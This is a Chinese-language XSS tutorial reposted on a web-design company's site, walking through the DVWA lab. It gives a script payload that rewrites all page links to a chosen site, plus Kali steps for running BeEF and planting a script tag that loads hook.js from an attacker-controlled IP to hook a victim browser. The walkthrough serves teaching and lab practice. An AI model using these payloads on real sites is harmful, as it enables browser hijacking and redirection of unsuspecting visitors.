XSS漏洞的惡意鏈接是怎樣的

這篇文章給大家介紹XSS漏洞的惡意鏈接是怎樣的,內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒,希望對(duì)大家能有所幫助。

讓客戶滿意是我們工作的目標(biāo),不斷超越客戶的期望值來自于我們對(duì)這個(gè)行業(yè)的熱愛。我們立志把好的技術(shù)通過有效、簡(jiǎn)單的方式提供給客戶,將通過不懈努力成為客戶在信息化領(lǐng)域值得信任、有價(jià)值的長(zhǎng)期合作伙伴,公司提供的服務(wù)項(xiàng)目有:國(guó)際域名空間、雅安服務(wù)器托管、營(yíng)銷軟件、網(wǎng)站建設(shè)、椒江網(wǎng)站維護(hù)、網(wǎng)站推廣。

一、環(huán)境:DVWA

二、修改網(wǎng)頁鏈接

1、點(diǎn)擊下面的網(wǎng)址,訪問的是不同的內(nèi)容

XSS漏洞的惡意鏈接是怎樣的XSS漏洞的惡意鏈接是怎樣的

2、通過xss漏洞,修改這些網(wǎng)址都指向百度

window.onload:當(dāng)窗口加載時(shí),執(zhí)行匿名函數(shù)

<script>

window.onload=function(){

var link=document.getElementsByTagName("a");

for(j=0;j<link.length;j++){

link[j].href="https://www.baidu.com";

}

}

</script>

3、在漏洞處輸入上面代碼,提交

XSS漏洞的惡意鏈接是怎樣的

 三、生成惡意鏈接(kali攻擊,win7被攻擊)

1、kali啟動(dòng)beff-xss

2、啟動(dòng)apache服務(wù):service apache2 start

3、cd /var/www/html

修改index.html

<script src="

http://控制端ip:3000/hook.js"></script>

XSS漏洞的惡意鏈接是怎樣的

5、被控端上線。

關(guān)于XSS漏洞的惡意鏈接是怎樣的就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到。

文章名稱:XSS漏洞的惡意鏈接是怎樣的
本文鏈接:http://muchs.cn/article4/jejjoe.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供手機(jī)網(wǎng)站建設(shè)、網(wǎng)站導(dǎo)航、外貿(mào)建站、網(wǎng)站策劃、動(dòng)態(tài)網(wǎng)站、服務(wù)器托管

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

成都網(wǎng)頁設(shè)計(jì)公司